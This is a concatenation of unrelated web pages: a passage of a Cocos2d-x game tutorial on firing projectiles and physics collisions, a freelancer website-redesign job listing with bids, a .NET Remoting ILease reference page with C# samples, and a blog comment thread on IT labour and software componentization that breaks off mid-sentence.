a way to protect himself. There are many ways to implement firepower in a game, but in this project you’ll have the user click or tap the screen to fire a projectile in the direction of the click or tap. Pew-pew! :] To keep things simple, you’ll implement this with a MoveTo action — but this means you’ll need to do a little math. The MoveTo action requires a destination for the projectile, but you can’t use the input location directly because that point only represents the direction to shoot relative to the player. You want to keep the bullet moving through that point until the bullet arrives at the final destination off-screen. Here’s a picture that illustrates the matter: The x and y offsets from the origin point to the touched location create a small triangle; you just need to make a big triangle with the same ratio – and you know you want one of the endpoints to be off-screen. Performing these calculations is a snap with Cocos2d-x’s included vector math routines. But before you can calculate where to move, you need to enable input event handling to figure out where the user touched! Add the following code to the end of HelloWorld::init, just above the return statement: auto eventListener = EventListenerTouchOneByOne::create(); eventListener->onTouchBegan = CC_CALLBACK_2(HelloWorld::onTouchBegan, this); this->getEventDispatcher()->addEventListenerWithSceneGraphPriority(eventListener, _player); Cocos2d-x versions 3 and up use EventDispatcher to dispatch various events, such as touch, accelerometer and keyboard events. Note: Throughout this discussion, the term “touch” refers to taps on a touch device as well as clicks on a desktop. Cocos2d-x uses the same methods for handling both types of events. In order to receive events from the EventDispatcher, you need to register an EventListener. There are two types of touch event listeners: EventListenerTouchOneByOne: This type calls your callback method once for each touch event. EventListenerTouchAllAtOnce: This type calls your callback method once with all of the touch events. Touch event listeners support four callbacks, but you only need to bind methods for the events you care about. onTouchBegan: Called when your finger first touches the screen. If you are using EventListenerTouchOneByOne, you must return truein order to receive any of the other three touch events. onTouchMoved: Called when your finger, already touching the screen, moves without lifting off the screen. onTouchEnded: Called when your finger lifts off the screen. onTouchCancelled: Called in certain circumstances that stop event handling, like when you are touching the screen and then something like a phone call interrupts the app. In this game, you really only care about when touches occur. Declare your callback to receive touch notifications in HelloWorldScene.h like so: bool onTouchBegan(Touch *touch, Event *unused_event); Then implement your callback in HelloWorldScene.cpp: bool HelloWorld::onTouchBegan(Touch *touch, Event *unused_event) { // 1 - Just an example for how to get the _player object //auto node = unused_event->getCurrentTarget(); // 2 Vec2 touchLocation = touch->getLocation(); Vec2 offset = touchLocation - _player->getPosition(); // 3 if (offset.x < 0) { return true; } // 4 auto projectile = Sprite::create("projectile.png"); projectile->setPosition(_player->getPosition()); this->addChild(projectile); // 5 offset.normalize(); auto shootAmount = offset * 1000; // 6 auto realDest = shootAmount + projectile->getPosition(); // 7 auto actionMove = MoveTo::create(2.0f, realDest); auto actionRemove = RemoveSelf::create(); projectile->runAction(Sequence::create(actionMove,actionRemove, nullptr)); return true; } There’s a lot going on in the method above, so take a moment to review it step by step. - The first line is commented out, but it’s there to show you how you can access the _playerobject that you passed as the second parameter to addEventListenerWithSceneGraphPriority(eventListener, _player). - Here you get the coordinate of the touch within the scene’s coordinate system and then calculate the offset of this point from the player’s current position. This is one example of vector math in Cocos2d-x. - If offset‘s xvalue is negative, it means the player is trying to shoot backwards. This is is not allowed in this game (real ninjas never look back!), so simply return without firing a projectile. - Create a projectile at the player’s position and add it to the scene. - You then call normalize()to convert the offset into a unit vector, which is a vector of length 1. Multiplying that by 1000 gives you a vector of length 1000 that points in the direction of the user’s tap. Why 1000? That length should be enough to extend past the edge of your screen at this resolution :] - Adding the vector to the projectile’s position gives you the target position. - Finally, you create an action to move the projectile to the target position over two seconds and then remove itself from the scene. Build and run your app; touch the screen to make your ninja fire away at the oncoming hordes! Collision Detection and Physics You now have shurikens flying everywhere — but what your ninja really wants to do is to lay some smack down. So you’ll need some code to detect when your projectiles intersect their targets. One nice thing about Cocos2d-x is it comes with a physics engine built right in! Not only are physics engines great for simulating realistic movement, but they are also great for detecting collisions. You’ll use Cocos2d-x’s physics engine to determine when monsters and projectiles collide. Start by adding the following code to HelloWorldScene.cpp, just above the implementation of HelloWorld::createScene: enum class PhysicsCategory { None = 0, Monster = (1 << 0), // 1 Projectile = (1 << 1), // 2 All = PhysicsCategory::Monster | PhysicsCategory::Projectile // 3 }; These bit masks define the physics categories you'll need in a bit - no pun intended! :] Here you've created two types, Monster and Projectile, along with two special values to specify no type or all types. You'll use these categories to assign types to your objects, allowing you to specify which types of objects are allowed to collide with each other. Note: You may be wondering what this fancy syntax is. The category on Cocos2d-x is simply a single 32-bit integer; this syntax sets specific bits in the integer to represent different categories, giving you 32 possible categories max. Here you set the first bit to indicate a monster, the next bit over to represent a projectile, and so on. Next, replace the first line of HelloWorld::createScene with the following code: auto scene = Scene::createWithPhysics(); scene->getPhysicsWorld()->setGravity(Vec2(0,0)); scene->getPhysicsWorld()->setDebugDrawMask(PhysicsWorld::DEBUGDRAW_ALL); This creates a Scene with physics enabled. Cocos2d-x uses a PhysicsWorld to control its physics simulation. Here you set the world's gravity to zero in both directions, which essentially disables gravity, and you enable debug drawing to see your physics bodies. It's helpful to enable debug drawing while you're prototyping physics interactions so you can ensure things are working properly. Inside HelloWorld::addMonster, add the following code right after the first line that creates the monster sprite: // 1 auto monsterSize = monster->getContentSize(); auto physicsBody = PhysicsBody::createBox(Size(monsterSize.width , monsterSize.height), PhysicsMaterial(0.1f, 1.0f, 0.0f)); // 2 physicsBody->setDynamic(true); // 3 physicsBody->setCategoryBitmask((int)PhysicsCategory::Monster); physicsBody->setCollisionBitmask((int)PhysicsCategory::None); physicsBody->setContactTestBitmask((int)PhysicsCategory::Projectile); monster->setPhysicsBody(physicsBody); Here's what the above code does: - Creates a PhysicsBodyfor the sprite. Physics bodies represent the object in Cocos2d-x's physics simulation, and you can define them using any shape. In this case, you use a rectangle of the same size as the sprite as a decent approximation for the monster. You could use a more accurate shape, but simpler shapes are good enough for most games and more performant. - Sets the sprite to be dynamic. This means that the physics engine will not apply forces to the monster. Instead, you'll control it directly through the MoveToactions you created earlier. Here, you set the category, collision and contact test bit masks: - Category: defines the object's type – Monster. - Collision: defines what types of objects should physically affect this object during collisions – in this case, None. Because this object is also dynamic, this field has no effect but is included here for the sake of completeness. - Contact Test: defines the object types with which collisions should generate notifications – Projectile. You'll register for and handle these notifications just a bit later in the tutorial. - Finally, you assign the physics body to the monster. Next, add the following code to HelloWorld::onTouchBegan, right after the line that sets projectile's position: auto projectileSize = projectile->getContentSize(); auto physicsBody = PhysicsBody::createCircle(projectileSize.width/2 ); physicsBody->setDynamic(true); physicsBody->setCategoryBitmask((int)PhysicsCategory::Projectile); physicsBody->setCollisionBitmask((int)PhysicsCategory::None); physicsBody->setContactTestBitmask((int)PhysicsCategory::Monster); projectile->setPhysicsBody(physicsBody); This is very similar to the physics setup you performed for the monsters, except it uses a circle instead of a rectangle to define the physics body. Note that it's not absolutely necessary to set the contact test bit mask because the monsters are already checking for collisions with projectiles, but it helps make your code's intention more clear. Build and run your project now; you'll see red shapes superimposed over your physics bodies, as shown below: Your projectiles are set up to hit monsters, so you need to remove both bodies when they collide. Remember that physics world from earlier? Well, you can set a contact delegate on it to be notified when two physics bodies collide. There you'll write some code to examine the categories of the objects, and if they're the monster and projectile, you'll make them go boom! First, add the following method declaration to HelloWorldScene.h: bool onContactBegan(PhysicsContact &contact); This is the method you'll register to receive the contact events. Next, implement the following method in HelloWorldScene.cpp: bool HelloWorld::onContactBegan(PhysicsContact &contact) { auto nodeA = contact.getShapeA()->getBody()->getNode(); auto nodeB = contact.getShapeB()->getBody()->getNode(); nodeA->removeFromParent(); nodeB->removeFromParent(); return true; } The PhysicsContact passed to this method contains information about the collision. In this game, you know that the only objects colliding will be monsters and projectiles. Therefore, you get the nodes involved in the collision and remove them from the scene. Finally, you need to register to receive contact notifications. Add the following lines to the end of HelloWorld::init, just before the return statement: auto contactListener = EventListenerPhysicsContact::create(); contactListener->onContactBegin = CC_CALLBACK_1(HelloWorld::onContactBegan, this); this->getEventDispatcher()->addEventListenerWithSceneGraphPriority(contactListener, this); This creates a contact listener, registers HelloWorld::onContactBegan to receive events and adds the listener to the EventDispatcher. Now, whenever two physics bodies collide and their category bit masks match their contact test bit masks, the EventDispatcher will call onContactBegan. Build and run your app; now when your projectiles intersect targets they should disappear: Most ninjas are silent, but not this one! Time to add some sound to your game. Finishing Touches You’re pretty close to having a workable (but extremely simple) game now. You just need to add some sound effects and music (since what kind of game doesn’t have sound!) and some simple game logic. Cocos2d-x comes with a simple audio engine called CocosDenshion which you'll use to play sounds. Note: Cocos2d-x also includes a second audio engine designed to replace the simple audio engine module. However, it is still experimental and it is not available for all the supported platforms, so you won't use it here. The project already contains some cool background music and an awesome "pew-pew" sound effect that you imported earlier. You just need to play them! To do this, add the following code to the top of HelloWorldScene.cpp, after the other #include statement: #include "SimpleAudioEngine.h" using namespace CocosDenshion; This imports the SimpleAudioEngine module and specifies that you'll be using the CocosDenshion namespace in this file. Next, add the following defines to HelloWorldScene.cpp, just above the PhysicsCategory enum: #define BACKGROUND_MUSIC_SFX "background-music-aac.mp3" #define PEW_PEW_SFX "pew-pew-lei.mp3" Here you define two string constants: BACKGROUND_MUSIC_SFX and PEW_PEW_SFX. This simply keeps your filenames in a single place, which makes it easier to change them later. Organizing your code like this (or even better, using a completely separate file) makes it easier to support platform-specific changes like using .mp3 files on iPhone and .wav files on Windows Phone. Now add the following line to the end of HelloWorld::init, just before the return statement: SimpleAudioEngine::getInstance()->playBackgroundMusic(BACKGROUND_MUSIC_SFX, true); This starts the background music playing as soon as your scene is set up. As for the sound effect, add the following line to HelloWorld::onTouchBegan, just above the return statement: SimpleAudioEngine::getInstance()->playEffect(PEW_PEW_SFX); This plays a nice "pew-pew" sound effect whenever the ninja attacks. Pretty handy, eh? You can play a sound effect with only a single line of code. Build and run, and enjoy your groovy tunes! Where to Go From Here? Here is the finished example game from the above tutorial. I hope you enjoyed learning about Cocos2d-x and feel inspired to make your own game! To learn more about Cocos2d-x, check out the Cocos2d-x website for great learning resources. If you have any questions or comments about this tutorial, please join the discussion below!
https://www.raywenderlich.com/95835/cocos2d-x-tutorial-beginners
CC-MAIN-2018-13
en
refinedweb
Website Redesign and added functionality Bütçe $300-1500 USD In need of a website redesign/update. We are an Adobe partner and sell Adobe software and offer training as well. The site will need a registration system for clients to register for a free seminar (online) as well as register/order training courses either at a clients site or in a public class. A new logo, banners and SEO are desired as well. Please send PM for more info and current URL (which will be changing). 51 freelancers are bidding on average $1022 for this job Hi, PM more details for a meaningful discussion. We have designed & developed more than 1000+ websites & can assure you of professionlism, quality & timely deliveries. View our reviews + projects won list mn you w Daha Fazla Hi, We have over 5 years of experience of web designing, search engine optimisation and web programming on php and other web technologies and programmed many applications. We are confident to complete this project with Daha Fazla hello, Kindly see PMB Thanks Hi, pls check pmb,thanx I run a Sacramento, CA website design firm with 8 years of design experience developing over 80 websites, and 13 years of IT Engineering experience. Your bid includes a complete design of your site to your specific req Daha Fazlala Please check your PMB for our proposal and our full portfolio. Thank you. EncodedART Inc – A Solution Provider Company. plz check PMB Hello, Japple! We are very glad you gave us a chance to place a bid on the project. I encourage you to view our portfolio at [url removed, login to view] We have good opportunities to develop this projec Daha Fazla We have a team of highly qualified and creative professionals. Give us a chance to show our talents and we assure you quality. [url removed, login to view] Hello Sir We are an offshore well established company for about more than five years. We have experienced developers (PHP, ASP, ASP.NET, MYSQL, C#,JAVA,JSP, C++ etc.) and those are dedicated in their respective fields. Daha Fazla Please check the PMB. Thanks Hello, Thank you for your time to read our proposal. Mxicoders is a leading IT solutions company to provide e-commerce, e-business and branding solutions to small and medium size business worldwide. Mxicoders Daha Fazla
https://www.tr.freelancer.com/projects/flash-website-design/website-redesign-added-functionality/
CC-MAIN-2018-13
en
refinedweb
ILease Interface Assembly: mscorlib (in mscorlib.dll). The following example consists of three assemblies: a client, a server, and a library shared by the client and server. Compile the library first, then the client and server. The following commands compile the Visual Basic files; to compile the C# files, use the csc command and.cs file extensions. The file names shown are only suggestions. It is not necessary to use all Visual Basic files or all C# files; once compiled, the assemblies work together regardless of the source language. To run the example, open two command windows. Run the server first, then run the client. If you place the client and server in separate folders, you must place a copy of the shared library in each folder. The following code is for the shared library. using System; using System.Runtime.Remoting; using System.Runtime.Remoting.Channels; using System.Runtime.Remoting.Lifetime; using System.Security.Permissions; namespace RemotingSamples { public class HelloService : MarshalByRefObject { public string HelloMethod(string name) { Console.WriteLine("Hello " + name); return "Hello " + name; } [SecurityPermissionAttribute(SecurityAction.LinkDemand, Flags=SecurityPermissionFlag.Infrastructure)] public override object InitializeLifetimeService() { ILease baseLease = (ILease)base.InitializeLifetimeService(); if (baseLease.CurrentState == LeaseState.Initial) { // For demonstration the initial time is kept small. // in actual scenarios it will be large. baseLease.InitialLeaseTime = TimeSpan.FromSeconds(15); baseLease.RenewOnCallTime = TimeSpan.FromSeconds(15); baseLease.SponsorshipTimeout = TimeSpan.FromMinutes(2); } return baseLease; } } } The following code is for the client assembly. using System; using System.Runtime.Remoting; using System.Runtime.Remoting.Channels; using System.Runtime.Remoting.Channels.Tcp; using System.Runtime.Remoting.Lifetime; namespace RemotingSamples { class HelloClient { static void Main() { // Register the channel. TcpChannel myChannel = new TcpChannel (); ChannelServices.RegisterChannel(myChannel); RemotingConfiguration.RegisterActivatedClientType( typeof(HelloService),"Tcp://localhost:8085"); TimeSpan myTimeSpan = TimeSpan.FromMinutes(10); // Create a remote object. HelloService myService = new HelloService(); ILease myLease; myLease = (ILease)RemotingServices.GetLifetimeService(myService); if (myLease == null) { Console.WriteLine("Cannot lease."); return; } Console.WriteLine ("Initial lease time is " + myLease.InitialLeaseTime); Console.WriteLine ("Current lease time is " + myLease.CurrentLeaseTime); Console.WriteLine ("Renew on call time is " + myLease.RenewOnCallTime); Console.WriteLine ("Sponsorship timeout is " + myLease.SponsorshipTimeout); Console.WriteLine ("Current lease state is " + myLease.CurrentState.ToString()); // Register with a sponser. ClientSponsor mySponsor = new ClientSponsor(); myLease.Register(mySponsor); Console.WriteLine("Wait for lease to expire (approx. 15 seconds)..."); System.Threading.Thread.Sleep(myLease.CurrentLeaseTime); Console.WriteLine ("Current lease time before renewal is " + myLease.CurrentLeaseTime); // Renew the lease time. myLease.Renew(myTimeSpan); Console.WriteLine ("Current lease time after renewal is " + myLease.CurrentLeaseTime); // Call the Remote method. Console.WriteLine("Remote method output is " + myService.HelloMethod("Microsoft")); myLease.Unregister(mySponsor); GC.Collect(); GC.WaitForPendingFinalizers(); // Register with lease time of 15 minutes. myLease.Register(mySponsor,TimeSpan.FromMinutes(15)); Console.WriteLine("Registered client with lease time of 15 minutes."); Console.WriteLine ("Current lease time is " + myLease.CurrentLeaseTime); // Call the Remote method. Console.WriteLine("Remote method output is " + myService.HelloMethod("Microsoft")); myLease.Unregister(mySponsor); } } } The following code is for the server assembly. using System; using System.Runtime.Remoting; using System.Runtime.Remoting.Channels; using System.Runtime.Remoting.Channels.Tcp; using System.Runtime.Remoting.Lifetime; namespace RemotingSamples { class HelloServer { static void Main() { TcpChannel myChannel = new TcpChannel (8085); ChannelServices.RegisterChannel(myChannel); RemotingConfiguration.RegisterActivatedServiceType(typeof(HelloService)); Console.WriteLine("Server started."); Console.WriteLine("Hit enter to terminate..."); Console.
https://technet.microsoft.com/en-us/library/system.runtime.remoting.lifetime.ilease(v=vs.80).aspx
CC-MAIN-2015-35
en
refinedweb
The FLVParser class parses FLV streams. More... #include <FLVParser.h> The FLVParser class parses FLV streams. Create an FLV parser reading input from the given IOChannel. References paddingBytes. Kills the parser.... Return number of bytes parsed so far. Reimplemented from gnash::media::MediaParser.. Seeks to the closest possible position the given position, and returns the new position. Implements gnash::media::MediaParser. The size of padding for all buffers that might be read by FFMPEG. This possibly also applies to other media handlers (gst). Ideally this would be taken from the current Handler, but we don't know about it here. Referenced by FLVParser().
http://gnashdev.org/doc/html/classgnash_1_1media_1_1FLVParser.html
CC-MAIN-2015-35
en
refinedweb
(new in Tk 8.4) The Spinbox widget is a variant of the standard Tkinter Entry widget, which can be used to select from a fixed number of values. When to use the Spinbox Widget The Spinbox widget can be used instead of an ordinary Entry, in cases where the user only has a limited number of ordered values to choose from. Note that the spinbox widget is only available Python 2.3 and later, when linked against Tk 8.4 or later. Also note that several Tk spinbox methods appears to be missing from the Tkinter bindings in Python 2.3. Patterns # The spinbox behaves pretty much like an ordinary Entry widget. The main difference is that you can specify what values to allow, either as a range, or using a tuple. from Tkinter import * master = Tk() w = Spinbox(master, from_=0, to=10) w.pack() mainloop() You can specify a set of values instead of a range: w = Spinbox(values=(1, 2, 4, 8)) w.pack() Reference # - Spinbox(master=None, **options) (class) [#] A spinbox widget. - master - Parent widget. - **options - Widget options. See the description of the config method for a list of available options. - bbox(index) [#] Returns the bounding box of a given character. - config(**options) [#] Modifies one or more widget options. If no options are given, the method returns a dictionary containing all current option values. - **options - Widget options. - activebackground= - Default is system specific. (activeBackground/Background) - background= - Default is system specific. (background/Background) - bd= - Same as borderwidth. - bg= - Same as background. - borderwidth= - Widget border width. The default is system specific, but is usually a few pixels. (borderWidth/BorderWidth) - buttonbackground= - Button background color. Default is system specific. (Button.background/Background) - buttoncursor= - Cursor to use when the mouse pointer is moved over the button part of this widget. No default value. (Button.cursor/Cursor) - buttondownrelief= - The border style to use for the up button. Default is RAISED. (Button.relief/Relief) - buttonuprelief= - The border style to use for the down button. Default is RAISED. (Button.relief/Relief) - command= - A function or method that should be called when a button is pressed. No default value. (command/Command) - cursor= - The cursor to use when the mouse pointer is moved over the entry part of this widget. Default is a text insertion cursor (usually XTERM). (cursor/Cursor) - disabledbackground= - The background color to use when the widget is disabled. The default is system specific. (disabledBackground/DisabledBackground) - disabledforeground= - The text color to use when the widget is disabled. The default is system specific. (disabledForeground/DisabledForeground) - exportselection= - Default is True. (exportSelection/ExportSelection) - fg= - Same as foreground. - font= - The font to use in this widget. Default is system specific. (font/Font) - foreground= - Text color. Default is system specific. (foreground/Foreground) - format= - Format string. No default value. (format/Format) - from= - The minimum value. Used together with to to limit the spinbox range. Note that from is a reserved Python keyword. To use this as a keyword argument, add an underscore (from_). (from/From) - highlightbackground= - Default is system specific. (highlightBackground/HighlightBackground) - highlightcolor= - Default is system specific. (highlightColor/HighlightColor) - highlightthickness= - No default value. (highlightThickness/HighlightThickness) - increment= - Default is 1.0. (increment/Increment) -= - No default value. (invalidCommand/InvalidCommand) - invcmd= - Same as invalidcommand. - justify= - Default is LEFT. (justify/Justify) - readonlybackground= - Default is system specific. (readonlyBackground/ReadonlyBackground) - relief= - Default is SUNKEN. (relief/Relief) - repeatdelay= - Together with repeatinterval, this option controls button auto-repeat. Both values are given in milliseconds. (repeatDelay/RepeatDelay) - repeatinterval= - See repeatdelay. (repeatInterval/RepeatInterval) - selectbackground= - Default is system specific. (selectBackground/Foreground) - selectborderwidth= - No default value. (selectBorderWidth/BorderWidth) - selectforeground= - Default is system specific. (selectForeground/Background) - state= - One of NORMAL, DISABLED, or “readonly”. Default is NORMAL. = - No default value. (textVariable/Variable) - to= - See from. (to/To) - validate= - Validation mode. Default is NONE. (validate/Validate) - validatecommand= - Validation callback. No default value. (validateCommand/ValidateCommand) - values= - A tuple containing valid values for this widget. Overrides from/to/increment. (values/Values) - vcmd= - Same as validatecommand. - width= - Widget width, in character units. Default is 20. (width/Width) - wrap= - If true, the up and down buttons will wrap around. (wrap/Wrap) - xscrollcommand= - Used to connect a spinbox field to a horizontal scrollbar. This option should be set to the set method of the corresponding scrollbar. (xScrollCommand/ScrollCommand) - delete(first, last=None) [#] Deletes one or more characters from the spinbox. - get() [#] Returns the current contents of the spinbox. - Returns: - The widget contents, as a string. - icursor(index) [#] Moves the insertion cursor to the given index. This also sets the INSERT index. - index - Where to move the cursor. - identify(x, y) [#] Identifies the widget element at the given location. - Returns: - One of “none”, “buttondown”, “buttonup”, or “entry”. - index(index) [#] Gets the numerical position corresponding to the given index. - index - An index. - Returns: - The corresponding numerical index. - insert(index, text) [#] Inserts text at the given index. Use insert(INSERT, text) to insert text at the cursor, insert(END, text) to append text to the spinbox. - index - Where to insert the text. - string - The text to insert. - invoke(element) [#] Invokes a spinbox button. - element - What button to invoke. Must be one of “buttonup” or “buttondown”. -. - selection_adjust(index) [#] Adjusts the selection to include also the given character. If index is already selected, do nothing. - index - The index. - selection_clear() [#] Clears the selection. - selection_element(element=None) [#] Selects an element. If no element is specified, this method returns the current element.
http://www.effbot.org/tkinterbook/spinbox.htm
CC-MAIN-2015-35
en
refinedweb
GETRLIMIT(2) BSD Programmer's Manual GETRLIMIT(2) getrlimit, setrlimit - control maximum system resource consumption #include <sys/types.h> #include <sys/time.h> creat- ed. RLIMIT_CPU The maximum amount of CPU time (in seconds) to be used by each process. RLIMIT_TIME The maximum amount of human contin- ue max- im().
https://www.mirbsd.org/htman/sparc/man2/setrlimit.htm
CC-MAIN-2015-35
en
refinedweb
Search: Search took 0.03 seconds. - 16 Dec 2009 4:10 PM Was using EXTjs 3.0. Have upgraded to 3.0.3 and it's still not playing ball (i.e. "namespace":"myNs" is not being appended to the extdirect_api.js file). I can confirm that the same files work... - 15 Dec 2009 1:54 PM Hi Dan, I'm assuming that if i set 'action_namespace', I should then call the direct functions using the namespace? Specifically, if I use your multiply example as an action in an a module called... - 9 Dec 2009 3:42 PM Cool. I'll have a play and let you know. W :-) - 9 Dec 2009 2:30 PM Thanks for this Dan, It's great! I'm staring a new project, and wondered if anyone has this working with 1.3/4, or should I stick to 1.2? I cant see anything in the source that would stop it... - 16 Nov 2009 11:22 AM - Replies - 2 - Views - 1,352 Thank you for taking the time to reply :-) - 13 Nov 2009 11:36 AM - Replies - 2 - Views - 1,352 I have a n00bish question.. I'm trying to follow Saki's big app method, but have got stuck. I'm not sure how you add a handler for a button bar to it's parent viewport onRender function. Example code... - 3 Jul 2009 9:55 AM I'm such a wally. the plugin parses the actions files, not the model files. puting the commneted function in the actions.class.php file fixed everything. - 2 Jul 2009 11:37 AM I'm still learning symfony, and am keen to use this plugin. I cant seem to get it to work though. Could you tell me where i went wrong here? Follwing the instructions in the readme, and using the... Results 1 to 8 of 8
https://www.sencha.com/forum/search.php?s=79f50cbfb646fc9ae40d38649a6e3036&searchid=12492388
CC-MAIN-2015-35
en
refinedweb
This section leads you through the steps needed to compile and run a simple example client application, HelloWorldMessage, that sends a message to a destination and then retrieves the same message from the destination. The code shown in Example 1–2 is adapted and simplified from an example program provided with the Message Queue installation: error checking and status reporting have been removed for the sake of conceptual clarity. You can find the complete original program in the helloworld directory in the following locations. Solaris: /usr/demo/imq/ Linux: opt/sun/mq/examples Windows: IMQ_HOME/demo To compile and run Java clients in a Message Queue environment, it is recommended that you use the Java 2 SDK, Standard Edition, version 1.4 or later. You can download the recommended SDK from the following location: Be sure to set your CLASSPATH environment variable correctly, as described in Setting Up Your Environment, before attempting to compile or run a client application. If you are using JDK 1.5, you will get compiler errors if you use the unqualified JMS Queue class along with the following import statement. import java.util.* This is because the packagesjava.util and javax.jms both contain a class named Queue. To avoid the compilation errors, you must eliminate the ambiguity by either fully qualifying references to the JMS Queue class as javax.jms.Queue or correcting your import statements to refer to specific individual java.util classes. The following steps for compiling and running the HelloWorldMessage application are furnished strictly as an example. The program is shipped precompiled; you do not actually need to compile it yourself (unless, of course, you modify its source code). Make:
http://docs.oracle.com/cd/E19906-01/820-5205/aeqau/index.html
CC-MAIN-2015-35
en
refinedweb
Supported .NET Framework Libraries With the common language runtime (CLR) hosted in SQL Server 2005, you can author stored procedures, triggers, user-defined functions, user-defined types, and user-defined aggregates in managed code. With the functionality found in the .NET Framework Library, you have access to pre-built classes that provide functionality for string manipulation, advanced math operations, file access, cryptography, and more. These classes can be accessed from any managed stored procedure, user-defined type, trigger, user-defined function, or user-defined aggregate. SQL Server 2005 has a list of supported .NET Framework libraries, which have been tested to ensure that they meet reliability and security standards for interaction with SQL Server 2005. Supported libraries do not need to be explicitly registered on the server before they can be used in your code; SQL Server loads them directly from the Global Assembly Cache (GAC). The libraries/namespaces supported by CLR integration in SQL Server 2005 are: - CustomMarshalers - Microsoft.VisualBasic - Microsoft.VisualC - mscorlib - System - System.Configuration - System.Data - System.Data.OracleClient - System.Data.SqlXml - System.Deployment - System.Security - System.Transactions - System.Web.Services - System.Xml.
https://msdn.microsoft.com/en-US/library/ms403279(v=sql.90).aspx
CC-MAIN-2015-35
en
refinedweb
Your Account by Kurt Cagle Does that change the economic picture? It means tool and license costs figure more in those projects that don't rely on open source, that mixed open and closed source systems (say ASP and PostGreSQL) are a bigger part of the mix, and that programming as a profession becomes even more of a tradecraft job with less status and possibly less women in the trade. It also means being multilingual at least to the ability to work well in a shop where accents and skills cause every third word to be lost, and it means increased emphasis on the documentation process. Somehow we get through these crunching changes but it is ever more evident that tradecraft level programming will become a supporting skill that many professions will require in addition to the principal skill set. The number of to-the-metal programmers can wax and wane and that will slow down the framework churn (do we need another word processor?) which might be a good thing. More importantly, however, is that the landscape for Network Engineers, Database Administrators and Systems Administrators is even more tight than for Developers, and these folks represent a critical part of the IT chain as well... It's a good time to be in IT, and many of the organizations that have resorted to off-shoring simply for cost reasons will find that the costs have been rearranged, not eliminated. I'm familiar with the developer landscape, somewhat less so for the administrative side of things, though I would agree with you that if anything this sector is likely to be even more squeezed than the dev side will be. IT admins tend to be as much as a decade older, and usually have received considerable advanced training. Unlike the developer workforce, IT admins are much closer to retirement, and if the age of offshoring has affected developers, it has also meant that many organizations have chosen to have only one or at best two admins in a given slot, making them vulnerable to both retirement and poaching. I've also wondered more than once whether the graphical approach that Microsoft has taken in its GUI admin tools may be backfiring. Such tools make it easier to administer sites, but at the cost typically of less understanding of what is in fact happening in the background. Admin positions especially tend to be trained on the job, and I suspect that this lack of understanding will propagate to the newer admins as a consequence. -- Kurt You know, it's funny, but I've been waiting for drag and drop programming for years, expecting with each subsequent generation of dev tools that we'll finally drop below the threshold at which programming becomes easy enough for the non-programmer. Curiously, it never quite seems to come. JavaScript or Ruby are arguably simpler than Java or C++, but they're being used increasingly to handle distributed computing where the efficiencies of formal type declaration get lost and the costs of such become quite real. Indeed, what I find intriguing is that JavaScript as a language is evolving into something much more evocative of Lisp or Scheme than the fairly basic language it started out from. I think programming has become more component oriented, which means that you can break down programming more into web developer vs. web designer roles (or app developer or app designer roles) but I don't necessarily think we're even close yet to the drag and drop level of programming, and I'm becoming increasingly convinced that we won't ever be. Programming is the art of dealing with complexity, and all that componentization does is expand the baseline of what can be done. Drag and drop is pretty common in the ASP.NET world. It doesn't mean one doesn't program; just that the need for lots of to-the-metal programmers has been reduced significantly. I'm not saying one doesn't need component builders, just fewer of them. The size of a site that can be built and maintained by a handful of skilled and skill sets continues to increase without significant increases in cost. completely disagreeing with you on this - I think that componentization is significantly streamlining production, though given the number of software projects that continue to fail compared to the overall number, I'm not really sure that it's really making that much difference. Certainly, one of the key effects that componentization (and standardization, which is just componentization of process) has is that it does, as you say, shift software production towards a different model, though I'm not sure that the assembly line is the right metaphor here. I think its worthwhile to differentiate here between the big software project and the small one. Componentization makes it possible for small software projects to be carried out by fewer people, but those people generally serve more to determine which components to use and then perform the necessary integration. While programmers may (and likely do) specialize, they typically are still experts of the pieces in their domain. Admittedly, if you talk about a modern assembly line, I'd say the analogy is closer, because in those cases most repetitive operations have been automated, and the occasional person exists primarily as a decision maker, as a designer (which is a decision maker of a different sort), or as a maintenance worker to keep the machines humming. Significantly, all three of these sets of skills require a high degree of training and education, and all three represent a fairly significant degree of autonomy. I also suspect that the H1B defeat in the Senate may very well end up hurting the software companies, though not IT in general. I do not buy the contention of the BSA or other software company alliances that the H1B visas are truly necessary - they represent cheap labor for these companies, who are now going to be forced to pay more for the home grown variety, but I suspect that global demand for software talent and services will only grow with time (because customization is, ultimately, the metier of programmers). Software companies exist to create "business components" - software that fulfills a certain requirement broadly enough that a large number of companies (or individuals) will buy that software. Customization is a counterveiling force to commoditization - software companies want to create commodities, because they make less money when they sell to fewer customers (especially in the face of rising labor prices). Customization, on the other hand, is what the customers want - applications that are written specifically to their needs and wants, and while price is certainly a factor, it's not the only one. Open source works on a purely economic level because it makes the cost of the components cheap to non-existent, which in turn means that the primary costs become the integrational labor (the customization labor) - though it also has the effect of pushing down the price of proprietary components. Note additionally that as the components themselves become more complex, the amount of work necessary to integrate those components to the specific needs of the company also increase. The complexity never completely disappears, because that complexity is driven largely by the customization aspect of the equation. Some programmers will be needed to build the components in the face of changing technology elsewhere; other programmers will be needed to manage the complexity of integrating those components, to handle the customization. I don't care whether your language is C++ or .NET or Java or ___fill-in-the-blank___, that much will remain true. I think as the number of components continue to rise and the capabilities of the components themselves evolve, the focus will shift increasingly to the second group, but I'm not sure their job is necessary any easier, it just works at a larger scope - the requirements gathering and analysis phases, distributed computational systems, and so forth that you mentioned in your first comment. Those are engineering tasks, not manufacturing ones. I did want to dissect one of your statements in greater detail: a big fan of large corporations, in general. They tend to resemble feudal fiefdoms far too closely for me to take a lot of comfort in their existence. Thus when I hear the talk about labor shortages by companies, I usually take a look at where they are getting there work done first, and by whom. I do tend to believe that the current crunch is due in part to the dawning realization on the part of the hiring agencies at these corporations that global demand for engineering talent is on the rise, and their ability to bring in lower priced talent from outside is diminishing. Moreover, demand tends to beget supply, though I suspect that, just as in the case of the oil companies not building up their infrastructure at times where demand is low (because they spent money on fancy buildings, extravagant parties, etc. when the money was there), their ability to move people through the hiring pipeline is currently fairly impaired. Will the pendulum swing the other way? Certainly, though not for some years yet. There was a huge glut of people that entered IT in the mid-1990s, most driven by IPO madness, just as there was a huge glut of people that entered into real estate services in the early part of this decade. IT had a fairly significant shaking out during the tech winter (just as it's probably not a good time to be in mortgage banking right now). This glut coincided with the rise of the Internet, the rise of component oriented software development, the dramatic increase in the number of powerful PCs, and not coincidentally the entry of the GenXers into the marketplace. We're now just off the peak of that population wave, heading down. There's a minor peak - the grandchildren of the boomers, on its way in about seven years, and the children of the GenXers, the Millenial babies, are now in second grade (my youngest was born in 2000, so she's at the very forefront of that next generation), so they'll enter the workforce in significant numbers in 2020. Significantly, both of these peaks are actually smaller than the boomers (the millennial generation 